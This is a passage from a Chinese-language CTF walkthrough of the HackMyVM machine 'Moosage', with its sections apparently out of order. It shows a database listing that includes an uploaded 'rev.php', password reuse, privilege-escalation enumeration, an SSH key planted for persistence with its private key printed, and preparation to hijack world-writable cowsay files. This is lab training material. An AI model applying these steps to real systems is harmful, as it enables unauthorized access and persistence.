1b7fad26-6111-11eb-8b33-0242c0a820020.jpg | data\/i\/13x5.jpg | data\/t\/13x5.jpg | jpg | baaa37b759cd0838ea635e7b767667ea | 2025-06-16 10:39:10 | 1 |\n| 2 | rev.gif | NULL | NULL | gif | 766b3d09b0f7a0807e635d12a17c56c6 | 2025-06-16 10:42:16 | 0 |\n| 3 | a.gif | data\/i\/3k94.gif | data\/t\/3k94.gif | gif | e2e612fd10a8f09e56c2ba50e75f6e81 | 2025-06-16 10:54:45 | 1 |\n| 4 | rev.jpg | data\/i\/4aPK.jpg | data\/t\/4aPK.jpg | jpg | 31c7a30396940b1e65d9006261de6c25 | 2025-06-16 10:56:50 | 1 |\n| 5 | rev.php | data\/i\/52Cp.php | data\/t\/52Cp.php | php | 07d48c04c024adf4070509af119d095e | 2025-06-16 11:22:33 | 1 |\n+----+-------------------------------------------+-----------------+-----------------+------+----------------------------------+---------------------+--------+\n5 rows in set (0.000 sec)\n\nERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'posts' at line 1\nMariaDB [moosage]> use information_schema;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [information_schema]> show tables;\n+---------------------------------------+\n| Tables_in_information_schema |\n+---------------------------------------+\n| ALL_PLUGINS |\n| APPLICABLE_ROLES |\n| CHARACTER_SETS |\n| CHECK_CONSTRAINTS |\n| COLLATIONS |\n| COLLATION_CHARACTER_SET_APPLICABILITY |\n| COLUMNS |\n| COLUMN_PRIVILEGES |\n| ENABLED_ROLES |\n| ENGINES |\n| EVENTS |\n| FILES |\n| GLOBAL_STATUS |\n| GLOBAL_VARIABLES |\n| KEY_CACHES |\n| KEY_COLUMN_USAGE |\n| PARAMETERS |\n| PARTITIONS |\n| PLUGINS |\n| PROCESSLIST |\n| PROFILING |\n| REFERENTIAL_CONSTRAINTS |\n| ROUTINES |\n| SCHEMATA |\n| SCHEMA_PRIVILEGES |\n| SESSION_STATUS |\n| SESSION_VARIABLES |\n| STATISTICS |\n| SYSTEM_VARIABLES |\n| TABLES |\n| TABLESPACES |\n| TABLE_CONSTRAINTS |\n| TABLE_PRIVILEGES |\n| TRIGGERS |\n| USER_PRIVILEGES |\n| VIEWS |\n| GEOMETRY_COLUMNS |\n| SPATIAL_REF_SYS |\n| CLIENT_STATISTICS |\n| INDEX_STATISTICS |\n| INNODB_SYS_DATAFILES |\n| USER_STATISTICS |\n| INNODB_SYS_TABLESTATS |\n| INNODB_LOCKS |\n| INNODB_MUTEXES |\n| INNODB_CMPMEM |\n| INNODB_CMP_PER_INDEX |\n| INNODB_CMP |\n| INNODB_FT_DELETED |\n| INNODB_CMP_RESET |\n| INNODB_LOCK_WAITS |\n| TABLE_STATISTICS |\n| INNODB_TABLESPACES_ENCRYPTION |\n| INNODB_BUFFER_PAGE_LRU |\n| INNODB_SYS_FIELDS |\n| INNODB_CMPMEM_RESET |\n| INNODB_SYS_COLUMNS |\n| INNODB_FT_INDEX_TABLE |\n| INNODB_CMP_PER_INDEX_RESET |\n| user_variables |\n| INNODB_FT_INDEX_CACHE |\n| INNODB_SYS_FOREIGN_COLS |\n| INNODB_FT_BEING_DELETED |\n| INNODB_BUFFER_POOL_STATS |\n| INNODB_TRX |\n| INNODB_SYS_FOREIGN |\n| INNODB_SYS_TABLES |\n| INNODB_FT_DEFAULT_STOPWORD |\n| INNODB_FT_CONFIG |\n| INNODB_BUFFER_PAGE |\n| INNODB_SYS_TABLESPACES |\n| INNODB_METRICS |\n| INNODB_SYS_INDEXES |\n| INNODB_SYS_VIRTUAL |\n| INNODB_TABLESPACES_SCRUBBING |\n| INNODB_SYS_SEMAPHORE_WAITS |\n+---------------------------------------+\n76 rows in set (0.000 sec)\n\nMariaDB [information_schema]> select * from user_variables;\nEmpty set (0.000 sec)\n\nMariaDB [information_schema]> exit\nBye<\/code><\/pre>\n\u5e76\u672a\u53d1\u73b0\u6709\u7528\u4fe1\u606f\u3002\u3002\u3002\u3002\u3002\u4f46\u662f\u53d1\u73b0\u4e86\u540c\u540d\u7528\u6237\uff0c\u5c1d\u8bd5\u5bc6\u7801\u590d\u7528\u53d1\u73b0\u6210\u529f\uff1a<\/p>\n
<\/div><\/p>\n\u57fa\u7840\u4fe1\u606f\u641c\u96c6<\/h3>\nbaca@moosage:~$ ls -la\ntotal 36\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 ..\n-rw-r--r-- 1 baca baca 220 Apr 22 2021 .bash_logout\n-rw-r--r-- 1 baca baca 3526 Apr 22 2021 .bashrc\n-rwx--x--x 1 baca baca 1920 Apr 22 2021 flag.sh\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .local\n-rw-r--r-- 1 baca baca 807 Apr 22 2021 .profile\n-rw------- 1 baca baca 13 Apr 22 2021 user.txt\n-rw------- 1 baca baca 53 Apr 22 2021 .Xauthority\nbaca@moosage:~$ .\/flag.sh \n\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m\n-------------------------\n\\nPWNED HOST: moosage\n\\nPWNED DATE: Mon 16 Jun 2025 11:39:58 AM EDT\n\\nWHOAMI: uid=1000(baca) gid=1000(baca) groups=1000(baca),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\nFLAG: hmvmessageme\n\\n------------------------\nbaca@moosage:~$ sudo -l\nbash: sudo: command not found\nbaca@moosage:~$ whereis sudo\nsudo:\nbaca@moosage:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\nbaca@moosage:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nbaca@moosage:~$ find \/ -type d -writable 2>\/dev\/null\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1000.slice\/user@1000.service\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1000.slice\/user@1000.service\/init.scope\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1000.slice\/user@1000.service\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1000.slice\/user@1000.service\/init.scope\n\/run\/user\/1000\n\/run\/user\/1000\/systemd\n\/run\/lock\n\/var\/lib\/php\/sessions\n\/var\/tmp\n\/home\/baca\n\/home\/baca\/.local\n\/home\/baca\/.local\/share\n\/home\/baca\/.local\/share\/nano\n\/dev\/mqueue\n\/dev\/shm\n\/proc\/1025\/task\/1025\/fd\n\/proc\/1025\/fd\n\/proc\/1025\/map_files\n\/tmp\n\/tmp\/.font-unix\n\/tmp\/.XIM-unix\n\/tmp\/.ICE-unix\n\/tmp\/.X11-unix\n\/tmp\/.Test-unix<\/code><\/pre>\n\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code>\u4ee5\u53capspy64<\/code>\uff0c\u4f46\u662f\u5747\u672a\u53d1\u73b0\u5229\u7528\u70b9\uff0c\u770b\u4e00\u4e0b\u5e08\u5085\u4eec\u7684wp<\/code>\uff0c\u53d1\u73b0\u5229\u7528\u70b9\u5c45\u7136\u9700\u8981ssh<\/code>\u8fdb\u884c\u767b\u5f55\u3002\u3002\u3002<\/p>\nSSH cowsay\u914d\u7f6e\u6587\u4ef6\u52ab\u6301<\/h3>\n
\u5148\u751f\u6210\u4e00\u4e2a\u79c1\u94a5\uff1a<\/p>\n
(remote) baca@moosage:\/tmp$ cd ~\n(remote) baca@moosage:\/home\/baca$ ls -la\ntotal 36\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 ..\n-rw-r--r-- 1 baca baca 220 Apr 22 2021 .bash_logout\n-rw-r--r-- 1 baca baca 3526 Apr 22 2021 .bashrc\n-rwx--x--x 1 baca baca 1920 Apr 22 2021 flag.sh\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .local\n-rw-r--r-- 1 baca baca 807 Apr 22 2021 .profile\n-rw------- 1 baca baca 13 Apr 22 2021 user.txt\n-rw------- 1 baca baca 53 Apr 22 2021 .Xauthority\n(remote) baca@moosage:\/home\/baca$ mkdir .ssh\n(remote) baca@moosage:\/home\/baca$ cd .ssh\n(remote) baca@moosage:\/home\/baca\/.ssh$ ssh-keygen -o\nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/baca\/.ssh\/id_rsa): \nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/baca\/.ssh\/id_rsa.\nYour public key has been saved in \/home\/baca\/.ssh\/id_rsa.pub.\nThe key fingerprint is:\nSHA256:pZJRKfzVdSbn1S\/q69LV6jI0uqyA6q\/QBGAdMKHK+hI baca@moosage\nThe key's randomart image is:\n+---[RSA 2048]----+\n|.=+... .. . .o *|\n|+ .. o.. . . *o|\n|o .o .. o|\n|o. o.o . .|\n|... o S . o |\n|Eo . . + . .|\n|o.. . . = o . |\n|.o . . .o = . |\n| o=o. ..o+o=. |\n+----[SHA256]-----+\n(remote) baca@moosage:\/home\/baca\/.ssh$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEA3k2MP0wQn7tzLdpT87olkrgzzCgB4UuUjN\/w7U41VimPJxxNdpJi\nZOw1cE34NkJQW+5yDVVmM4JckQFvcVuJ0posXVU1mLczE7LIF6ghnDYq7frUVb0vBEnMl8\n08YD20lZHZEQiYyX6ZewUIzblJmz3SmUrKeF9hTQYZ9dNPtU9pfBGDlN2uu3zIBj4y\/\/XU\nmBEihqpsqGg5KsqydbmHHv1B9TKP3Zp2RO4bj3ahAJ4PXlxDCqVqlSXwnmprnMVbUtfLw6\nUXf2p3HbKx253Vwd\/587J70tS+JE7IgIuVJRAsAg+YoDxrUYPA2rVEeOPceZIXQkGH7Eui\n04Y\/VXzvFQAAA8jHrPPNx6zzzQAAAAdzc2gtcnNhAAABAQDeTYw\/TBCfu3Mt2lPzuiWSuD\nPMKAHhS5SM3\/DtTjVWKY8nHE12kmJk7DVwTfg2QlBb7nINVWYzglyRAW9xW4nSmixdVTWY\ntzMTssgXqCGcNirt+tRVvS8EScyXzTxgPbSVkdkRCJjJfpl7BQjNuUmbPdKZSsp4X2FNBh\nn100+1T2l8EYOU3a67fMgGPjL\/9dSYESKGqmyoaDkqyrJ1uYce\/UH1Mo\/dmnZE7huPdqEA\nng9eXEMKpWqVJfCeamucxVtS18vDpRd\/ancdsrHbndXB3\/nzsnvS1L4kTsiAi5UlECwCD5\nigPGtRg8DatUR449x5khdCQYfsS6LThj9VfO8VAAAAAwEAAQAAAQEAgD+65pWKjayGEXEA\nt\/6vSIrujxyRoRmKdQ+JHk7dZH0LcmPYqMxg6ZqAZe8FgMAXPkI9GEYpdRQDNUDfu0U1KQ\nP7DklnZ1hhpj6hQ0yjP0zczXjE4UYIhu\/Qkc88wsU2loeS9EnCY5SfFSLdZlo8BczP39IP\nJwzXxKj9dx3WwWEguzVLzCtS3WQEIVS37oKDu1MgWN4ZJoCeN+5ciiOP5DBUfI7IPbYIPg\nJqEJjq7fohkH1fe3XIUM9e8bt+gSDsd051EU1kccm7fsuRH7Ze1lEBcPtlANJwoJ+7VxGX\nP2PGoEVEthm58gNdOG7p+PMbmVmylXkvVwrnpq\/f0qQpAQAAAIArsg0i+ISVd2ubLa7PAA\n\/D\/C+SZeb24OdA2evT02RHR0pBltJ9OzPWMPMmVXoanvH10VV0E8bslbhC64TW7Gqsk0yc\nFXwId4+RsdzawHQSRZvur0RnzB0\/WJL0IR20hPr7yX7VF8\/dyjDrdr03Q9pjsmlFSJ\/uxA\njlWep3xLyOzQAAAIEA9WUB10a1I9hD9PJ0agVNv+CAA5ta7JJPMu8xtdt\/rKINqAyAbW1x\newjHwMdcHPUqVT18YXzhpQxqlawj1aiAamSmt0+6XKgH7DB\/vEJ\/Z\/2dhCatO6VP5BVUC\/\ncTs+GnrHA1scYaKN3cAltuMDPeHPcl68BA9pGyVlnthUizaNUAAACBAOfpD0l+qgIY+FCb\nYf4YWAU9a9eyRsXGXZFbZX9wfxQkyovhZtt4IKdNi+kUCf+BbWf63rrvD3b5ct\/s+J4Wq1\nHLAsH\/q+JhzPxVy4xgeGqwIYBNdVX6gs3PP+GB3zATkKZFkH+zu7UlOCbZ7NrCPFaCqg5i\nl\/xygU\/EtYiLao1BAAAADGJhY2FAbW9vc2FnZQECAwQFBg==\n-----END OPENSSH PRIVATE KEY-----\n(remote) baca@moosage:\/home\/baca\/.ssh$ mv id_rsa.pub authorized_keys\n(remote) baca@moosage:\/home\/baca\/.ssh$ ls -la\ntotal 16\ndrwxrwxrwx 2 baca baca 4096 Jun 16 12:10 .\ndrwxr-xr-x 4 baca baca 4096 Jun 16 12:09 ..\n-rw-r--r-- 1 baca baca 394 Jun 16 12:09 authorized_keys\n-rw------- 1 baca baca 1823 Jun 16 12:09 id_rsa<\/code><\/pre>\n\u8fdb\u884cssh<\/code>\u767b\u5f55\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ vim baca\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ chmod 600 baca \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ ssh baca@$IP -i baca\nbaca@192.168.10.106: Permission denied (publickey).<\/code><\/pre>\n\u53d1\u73b0\u53ef\u80fd\u662f\u6743\u9650\u914d\u7f6e\u95ee\u9898\uff1a<\/p>\n
(remote) baca@moosage:\/home\/baca$ ls -la\ntotal 40\ndrwxr-xr-x 4 baca baca 4096 Jun 16 12:09 .\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 ..\n-rw-r--r-- 1 baca baca 220 Apr 22 2021 .bash_logout\n-rw-r--r-- 1 baca baca 3526 Apr 22 2021 .bashrc\n-rwx--x--x 1 baca baca 1920 Apr 22 2021 flag.sh\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .local\n-rw-r--r-- 1 baca baca 807 Apr 22 2021 .profile\ndrwxrwxrwx 2 baca baca 4096 Jun 16 12:10 .ssh\n-rw------- 1 baca baca 13 Apr 22 2021 user.txt\n-rw------- 1 baca baca 53 Apr 22 2021 .Xauthority\n(remote) baca@moosage:\/home\/baca$ chmod 700 .ssh<\/code><\/pre>\n\u7136\u540e\u5c31\u53ef\u4ee5ssh\u767b\u5f55\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u627e\u4e00\u4e0b\u8fd9\u4e2acowsay<\/code>\uff1a\uff08\u4e0d\u8981\u95ee\u6211\u4e3a\u5565\u662fcowsay\uff0c\u56e0\u4e3a\u7528\u8fc7\uff0c\u4e5f\u53ef\u4ee5\u95eeai\u6216\u8005google\uff09<\/p>\nbaca@moosage:~$ find \/ -name "*cowsay*" 2>\/dev\/null\n\/var\/lib\/dpkg\/info\/cowsay.list\n\/var\/lib\/dpkg\/info\/cowsay.md5sums\n\/var\/cache\/apt\/archives\/cowsay_3.03+dfsg2-6_all.deb\n\/usr\/share\/doc\/cowsay\n\/usr\/share\/doc\/cowsay\/examples\/cowsay_random\n\/usr\/share\/cowsay\n\/usr\/share\/bash-completion\/completions\/cowsay\n\/usr\/share\/man\/man6\/cowsay.6.gz\n\/usr\/games\/cowsay\nbaca@moosage:~$ whereis cowsay\ncowsay: \/usr\/games\/cowsay \/usr\/share\/cowsay \/usr\/share\/man\/man6\/cowsay.6.gz\nbaca@moosage:~$ ls -la \/usr\/games\/cowsay\n-rwxr-xr-x 1 root root 4664 Feb 3 2019 \/usr\/games\/cowsay\nbaca@moosage:~$ ls -la \/usr\/share\/cowsay\ntotal 12\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 .\ndrwxr-xr-x 98 root root 4096 Apr 22 2021 ..\ndrwxr-xr-x 2 root root 4096 Apr 22 2021 cows\nbaca@moosage:~$ ls -la \/usr\/share\/cowsay\/cows\ntotal 192\ndrwxr-xr-x 2 root root 4096 Apr 22 2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 ..\n-rw-rw-rw- 1 root root 115 Feb 3 2019 apt.cow\n-rw-rw-rw- 1 root root 310 Aug 14 1999 bud-frogs.cow\n-rw-rw-rw- 1 root root 123 Aug 14 1999 bunny.cow\n-rw-rw-rw- 1 root root 1127 Feb 3 2019 calvin.cow\n-rw-rw-rw- 1 root root 480 Aug 14 1999 cheese.cow\n-rw-rw-rw- 1 root root 181 Feb 3 2019 cock.cow\n-rw-rw-rw- 1 root root 230 Aug 14 1999 cower.cow\n-rw-rw-rw- 1 root root 569 Aug 14 1999 daemon.cow\n-rw-rw-rw- 1 root root 175 Aug 14 1999 default.cow\n-rw-rw-rw- 1 root root 1284 Nov 3 1999 dragon-and-cow.cow\n-rw-rw-rw- 1 root root 1000 Aug 14 1999 dragon.cow\n-rw-rw-rw- 1 root root 132 Feb 3 2019 duck.cow\n-rw-rw-rw- 1 root root 284 Aug 14 1999 elephant.cow\n-rw-rw-rw- 1 root root 357 Feb 3 2019 elephant-in-snake.cow\n-rw-rw-rw- 1 root root 585 Aug 14 1999 eyes.cow\n-rw-rw-rw- 1 root root 490 Aug 14 1999 flaming-sheep.cow\n-rw-rw-rw- 1 root root 1018 Aug 14 1999 ghostbusters.cow\n-rw-rw-rw- 1 root root 1054 Feb 3 2019 gnu.cow\n-rw-rw-rw- 1 root root 126 Aug 14 1999 hellokitty.cow\n-rw-rw-rw- 1 root root 687 Feb 3 2019 kangaroo.cow\n-rw-rw-rw- 1 root root 637 Aug 14 1999 kiss.cow\n-rw-rw-rw- 1 root root 162 Aug 14 1999 koala.cow\n-rw-rw-rw- 1 root root 406 Aug 14 1999 kosh.cow\n-rw-rw-rw- 1 root root 226 Feb 3 2019 luke-koala.cow\n-rw-rw-rw- 1 root root 814 Feb 3 2019 mech-and-cow.cow\n-rw-rw-rw- 1 root root 439 Aug 14 1999 milk.cow\n-rw-rw-rw- 1 root root 249 Feb 3 2019 moofasa.cow\n-rw-rw-rw- 1 root root 203 Aug 14 1999 moose.cow\n-rw-rw-rw- 1 root root 1623 Feb 3 2019 pony.cow\n-rw-rw-rw- 1 root root 305 Feb 3 2019 pony-smaller.cow\n-rw-rw-rw- 1 root root 252 Aug 14 1999 ren.cow\n-rw-rw-rw- 1 root root 234 Aug 14 1999 sheep.cow\n-rw-rw-rw- 1 root root 433 Aug 14 1999 skeleton.cow\n-rw-rw-rw- 1 root root 283 Feb 3 2019 snowman.cow\n-rw-rw-rw- 1 root root 854 Aug 14 1999 stegosaurus.cow\n-rw-rw-rw- 1 root root 364 Aug 14 1999 stimpy.cow\n-rw-rw-rw- 1 root root 229 Feb 3 2019 suse.cow\n-rw-rw-rw- 1 root root 293 Aug 14 1999 three-eyes.cow\n-rw-rw-rw- 1 root root 1302 Aug 14 1999 turkey.cow\n-rw-rw-rw- 1 root root 1105 Aug 14 1999 turtle.cow\n-rw-rw-rw- 1 root root 215 Nov 12 1999 tux.cow\n-rw-rw-rw- 1 root root 1718 Feb 3 2019 unipony.cow\n-rw-rw-rw- 1 root root 365 Feb 3 2019 unipony-smaller.cow\n-rw-rw-rw- 1 root root 279 Aug 14 1999 vader.cow\n-rw-rw-rw- 1 root root 213 Aug 14 1999 vader-koala.cow\n-rw-rw-rw- 1 root root 248 Aug 14 1999 www.cow<\/code><\/pre>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nYou miss 100% of the ports you don't scan. - RustScan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.106:22\nOpen 192.168.10.106:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 02:65:e6:05:af:c8:81:9c:30:b0:da:e3:1e:d8:be:02 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDv+qPYyD6jIW9PZIAMgz4ojpJlvs2EWCtw4GyIHiX3\/UMJ0qISwj04rljLXmmvTALNi9GYKPDlnh7vrAKbnKhIhef114wHFrPjTMNI7m+nEqvN0yuxGmS6oIHkzz5sNXvxSnVRfqqpFheZqXmY5qrrcSV+TgFKEZs94WzZFp7yzyDX4AnU+Mp7AMrZzYEtDqLFJBviK27rTZ9RJqmH9VTiHENSr0+UHTLPKVxnKCdPuAXLmbd167bQsMdoQ5\/Rn7RgUbwjF8hSpgrRvJ9pAuLrNIEGe1zeeVoZTZmpn8yvjVKDNV2qOh69mf+uam9r\/KrDqr1b7QGiRnIBXryAUBwv\n| 256 3f:7d:4b:86:8d:c7:01:8f:b3:56:6d:65:c2:e5:cf:4e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNW4D2ORbPVJ9OINylplX0ks+ihYcAng5XYoc1anWtC9jJstK9F01AivJdESyyEPmA+qnN9\/uPnhS8aXYirauwc=\n| 256 8e:d4:b8:d6:8e:d9:61:a1:3e:7f:5e:d7:ec:dc:bb:de (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAlNJzSVpE+7Dt7rN2EgYoqsw+pS9EhnA9x9L\/iwHVH\n80\/tcp open http syn-ack ttl 64 nginx 1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n|_http-title: 403 Forbidden\n|_http-server-header: nginx\/1.14.2\nMAC Address: 08:00:27:97:77:DD (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2>\/dev\/null\n\n404 GET 7l 12w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog => http:\/\/192.168.10.106\/blog\/\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/\n200 GET 508l 1672w 18089c http:\/\/192.168.10.106\/blog\/static\/scripts\/lightbox.js\n200 GET 4l 1292w 86351c http:\/\/192.168.10.106\/blog\/static\/scripts\/jquery.min.js\n200 GET 10l 27w 1404c http:\/\/192.168.10.106\/blog\/static\/images\/profile.jpg\n200 GET 14l 61w 3142c http:\/\/192.168.10.106\/blog\/static\/images\/profile_big.jpg\n200 GET 4l 10w 438c http:\/\/192.168.10.106\/blog\/static\/images\/zpEYXu5Wdu6.png\n200 GET 44l 3937w 100276c http:\/\/192.168.10.106\/blog\/static\/scripts\/highlight-10.1.2.min.js\n200 GET 213l 403w 3891c http:\/\/192.168.10.106\/blog\/static\/styles\/lightbox.css\n200 GET 292l 921w 7770c http:\/\/192.168.10.106\/blog\/static\/scripts\/autosize.js\n200 GET 83l 105w 1026c http:\/\/192.168.10.106\/blog\/static\/styles\/highlight-monokai-sublime.css\n200 GET 140l 288w 2330c http:\/\/192.168.10.106\/blog\/static\/styles\/main.css\n200 GET 198l 440w 4317c http:\/\/192.168.10.106\/blog\/static\/scripts\/datepick.js\n200 GET 1293l 2393w 23974c http:\/\/192.168.10.106\/blog\/static\/styles\/theme02.css\n200 GET 1102l 2150w 25882c http:\/\/192.168.10.106\/blog\/static\/scripts\/app.js\n200 GET 268l 683w 10091c http:\/\/192.168.10.106\/blog\/index.php\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/blog\/static\/styles\/\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/blog\/static\/images\/\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/blog\/static\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/static\/images => http:\/\/192.168.10.106\/blog\/static\/images\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/data => http:\/\/192.168.10.106\/blog\/data\/\n200 GET 0l 0w 0c http:\/\/192.168.10.106\/blog\/common.php\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/blog\/static\/scripts\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/static => http:\/\/192.168.10.106\/blog\/static\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/static\/scripts => http:\/\/192.168.10.106\/blog\/static\/scripts\/\n200 GET 1l 3w 47c http:\/\/192.168.10.106\/blog\/ajax.php\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/app => http:\/\/192.168.10.106\/blog\/app\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/app\/db => http:\/\/192.168.10.106\/blog\/app\/db\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/static\/styles => http:\/\/192.168.10.106\/blog\/static\/styles\/\n200 GET 2l 4w 25c http:\/\/192.168.10.106\/blog\/robots.txt\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/app\/lang => http:\/\/192.168.10.106\/blog\/app\/lang\/\n200 GET 674l 5644w 35149c http:\/\/192.168.10.106\/blog\/LICENSE\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/app\/db\/mysql => http:\/\/192.168.10.106\/blog\/app\/db\/mysql\/<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div>
\n<\/div><\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ curl http:\/\/192.168.10.106\/blog\/robots.txt \nUser-agent: *\nDisallow: \/ \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ whatweb http:\/\/$IP\/blog\nhttp:\/\/192.168.10.106\/blog [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx\/1.14.2], IP[192.168.10.106], RedirectLocation[http:\/\/192.168.10.106\/blog\/], Title[301 Moved Permanently], nginx[1.14.2]\nhttp:\/\/192.168.10.106\/blog\/ [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx\/1.14.2], HttpOnly[PHPSESSID], IP[192.168.10.106], JQuery, Lightbox, PasswordField[password], Script, Title[Blog], X-UA-Compatible[IE=edge], nginx[1.14.2]<\/code><\/pre>\n\u770b\u4e00\u4e0b\u8fd9\u4e2a\u535a\u5ba2\u662f\u4e0d\u662f\u5565\u5f00\u6e90\u7684\u535a\u5ba2\uff1a<\/p>\n
<\/div><\/p>\n\u5f00\u6e90\u4fe1\u606f\u641c\u96c6<\/h3>\n
